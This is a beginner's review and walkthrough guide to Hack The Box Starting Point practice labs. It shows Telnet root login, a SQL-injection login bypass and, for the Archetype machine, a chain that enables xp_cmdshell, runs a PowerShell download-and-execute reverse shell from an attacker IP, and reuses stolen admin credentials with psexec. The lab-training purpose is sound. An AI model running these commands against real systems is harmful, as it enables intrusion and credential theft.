Bottom line: HTB Starting Point is the best structured on-ramp into hands-on hacking that exists right now. Free, beginner-friendly, and connected to the real HTB ecosystem — it’s where you should start before touching anything else on the platform.
What Is HTB Starting Point?
Hack The Box is known for being notoriously difficult. Machines go live, the community races to root them, and beginners often feel left behind staring at a VPN config and an empty nmap scan, wondering what they’re doing wrong.
Starting Point fixes that.
It’s a structured, guided section of HTB designed specifically for newcomers. You get:
- A sequence of machines arranged in tiers of increasing difficulty
- Official writeups for every machine (available immediately — no waiting)
- Guided questions that walk you through the attack chain step by step
- A VPN connection to a dedicated, isolated network
Think of it as HTB’s answer to “I want to practice but I don’t know where to start.” It works.
How Starting Point Is Organized
Starting Point is broken into three tiers:
Tier 0 — The Absolute Basics
Tier 0 is about fundamentals. These machines aren’t really vulnerable in the traditional sense — they’re teaching you how to use the tools. You’ll cover:
- Meow — Telnet, unauthenticated access, basic enumeration
- Fawn — FTP, anonymous login, file retrieval
- Dancing — SMB enumeration with
smbclient - Redeemer — Redis,
redis-cli, unauthenticated data access - Explosion — RDP with
xfreerdp, no credentials required - Preignition — Web directory brute-forcing with
gobuster - Mongod — MongoDB, unauthenticated shell access
- Synced — Rsync, unprotected file sync service
None of these will teach you exploitation in the classic sense. They’ll teach you to enumerate, connect, and interact with services. That’s the foundation everything else builds on.
Tier 1 — Initial Access
Tier 1 machines require you to find and exploit a vulnerability to get a foothold. No post-exploitation yet — just getting in. Machines include:
- Appointment — SQL injection against a login form
- Sequel — MySQL, credential reuse, manual SQL queries
- Crocodile — FTP credentials + web login panel
- Responder — LLMNR poisoning with Responder, capturing NTLMv2 hashes
- Three — AWS S3 bucket misconfiguration, subdomain enumeration
- Ignition — Default credentials on a web admin panel (Magento)
- Bike — Server-Side Template Injection (SSTI) in Node.js
- Funnel — SSH port forwarding, PostgreSQL
- Pennyworth — Jenkins Groovy script console RCE
- Tactics — PsExec, SMB authentication, Windows privilege escalation
Tier 2 — Foothold to Root
Tier 2 is where it starts feeling like real pentesting. You’re chaining vulnerabilities — initial access, privilege escalation, sometimes lateral movement. Key machines:
- Archetype — MSSQL xp_cmdshell, WinRM, Windows privesc via PowerShell history
- Oopsie — IDOR, PHP file upload, SUID binary abuse on Linux
- Vaccine — FTP, SQL injection, sudo GTFOBin for root
- Unified — Log4Shell (CVE-2021-44228), MongoDB manipulation, UniFi Network exploitation
- Included — LFI + TFTP, LXD container breakout
- Markup — XXE, SSH key in source code, Windows scheduled task privesc
- Base — PHP type juggling, sudo file copy exploit
Getting Started: The Setup
Step 1: Create a Free Account
Go to hackthebox.com and register. Free accounts get access to all of Starting Point — you don’t need a VIP subscription for any of this.
Step 2: Download Your VPN Config
Navigate to Starting Point in the sidebar, then go to Connection and download the .ovpn file for Starting Point (it’s separate from the main HTB VPN).
sudo openvpn starting_point_YourUsername.ovpn
Wait for Initialization Sequence Completed. Then in a separate terminal:
ping 10.129.X.X # Use the machine's IP from the HTB interface
If it replies, you’re connected.
Step 3: Spawn a Machine
Click Starting Point → select Tier 0 → pick Meow → click Spawn Machine. HTB allocates a VM and gives you an IP. You have 24 hours before it auto-despawns (you can always respawn).
Working Through Tier 0: Example Walkthrough
Let’s walk through Meow — the very first machine — as a concrete example of the workflow.
Meow — Telnet Access
Target: 10.129.X.X (whatever IP HTB assigns)
Step 1: Ping the target
ping -c 3 10.129.X.X
Confirms the machine is up.
Step 2: Scan open ports
nmap -sV 10.129.X.X
You’ll see port 23 (Telnet) is open.
Step 3: Connect via Telnet
telnet 10.129.X.X
You’ll be prompted for a login. Try root with no password. It works. You’re in.
Step 4: Find the flag
ls
cat flag.txt
Submit the flag in the HTB interface. Machine complete.
That’s the Tier 0 loop: enumerate → connect → get flag. Simple by design. The point is learning the tools, not the puzzles.
Working Through Tier 1: Example Walkthrough
Appointment — SQL Injection
Step 1: Nmap scan
nmap -sC -sV 10.129.X.X
Port 80 is open. HTTP.
Step 2: Browse the site You find a login form. Classic setup.
Step 3: Test for SQL injection In the username field, try:
admin'--
With any password. This comments out the password check in the SQL query.
Step 4: Login succeeds You’re in. Flag is on the dashboard.
The lesson: never trust user input. The login SQL query looks something like:
SELECT * FROM users WHERE username='INPUT' AND password='INPUT'
Your injection turns it into:
SELECT * FROM users WHERE username='admin'--' AND password='anything'
Everything after -- is commented out. Authentication bypassed.
Working Through Tier 2: Example Walkthrough
Archetype — The Full Chain
This is the most instructive machine in Starting Point. It teaches you the full Windows attack chain that shows up constantly in real engagements.
Step 1: Enumerate
nmap -sC -sV -p- 10.129.X.X
You’ll see: SMB (445), MSSQL (1433), WinRM (5985).
Step 2: SMB enumeration
smbclient -N -L \\\\10.129.X.X
smbclient -N \\\\10.129.X.X\\backups
get prod.dtsConfig
The config file contains MSSQL credentials in plaintext: sql_svc / M3g4c0rp123.
Step 3: MSSQL shell
python3 mssqlclient.py ARCHETYPE/sql_svc:[email protected] -windows-auth
Using Impacket’s mssqlclient.py.
Step 4: Enable xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Step 5: Get a reverse shell Host a malicious PowerShell script via Python’s HTTP server, execute it via xp_cmdshell, catch the shell with netcat.
xp_cmdshell "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://YOUR_IP/shell.ps1')"
Step 6: Find the PowerShell history file
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
It contains: net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
Step 7: Escalate to Administrator
python3 psexec.py administrator:MEGACORP_4dm1n\!\!@10.129.X.X
Root flag is at C:\Users\Administrator\Desktop\root.txt.
That’s the chain: SMB credentials → MSSQL → xp_cmdshell → RCE → credential reuse → full compromise. This exact pattern appears in real Active Directory environments.
Tips That Actually Help
Use the official writeups strategically. They’re there. Don’t feel bad about using them — but try to read them after you’ve attempted the machine, not before. The struggle is where the learning happens.
Take notes as you go. Starting Point machines are designed to teach transferable techniques. Document every command you run and why. Your notes from Archetype will help you in real engagements.
Don’t skip Tier 0 even if it feels too easy. The tools you use there — nmap, smbclient, redis-cli, xfreerdp — come up constantly. Knowing them cold matters.
Set up your attack machine properly. Kali Linux or Parrot OS in a VM. Make sure Impacket is installed:
pip3 install impacket
And that you have common tools ready: nmap, gobuster, netcat, python3, curl.
Use -sC -sV in nmap by default. -sC runs default scripts, -sV gets service versions. Together they catch most things a basic port scan misses.
What Comes After Starting Point?
Once you’ve finished all three tiers, you’re ready for the main HTB platform. Recommended next steps:
- Active Machines (Easy tier) — Current boxes, retired Easy machines with community writeups available after you solve them
- HTB Academy — Structured learning modules that pair with machine practice
- Pro Labs (Offshore, RastaLabs) — Full Active Directory environments simulating corporate networks — this is where Starting Point skills get stress-tested at scale
If you’re targeting OSCP, Starting Point’s Tier 2 machines are a solid warm-up. The Windows machines especially mirror the exam environment: service enumeration, credential hunting, privilege escalation via misconfigurations.
Common Mistakes (And How to Avoid Them)
Wrong VPN. Starting Point uses a separate VPN config from the main HTB platform. If you’re connected to the main VPN, you won’t reach Starting Point machines. Download the correct .ovpn from the Starting Point page.
Skipping enumeration. Every machine in Starting Point is solvable with thorough enumeration. If you’re stuck, run a full port scan (-p-), check service banners, and enumerate every service you find before assuming you need to exploit something exotic.
Ignoring the guided questions. HTB provides task questions for each machine that hint at the attack path without giving it away. Read them. They’re structured to guide your thinking without spoiling the solution.
Using outdated tools. Some writeups you find online are from 2020-2022. Commands change, tool flags change. When in doubt, check --help or the man page for the version you’re running.
Final Assessment
HTB Starting Point is genuinely well-designed. It respects your time, it teaches real techniques, and it connects directly to the broader HTB ecosystem so your progress means something. The three-tier structure is smart — you build tool fluency in Tier 0, initial access skills in Tier 1, and full kill-chain thinking in Tier 2.
If you’re new to pentesting and wondering where to start practicing: here. Not TryHackMe rooms, not YouTube tutorials, not theory. Spin up Meow, connect your VPN, and run your first nmap scan. That’s the start.
Ryuk writes from 14+ years in offensive security. Content is practitioner-reviewed and may be AI-assisted. HTB affiliate partnership pending — links are unaffiliated.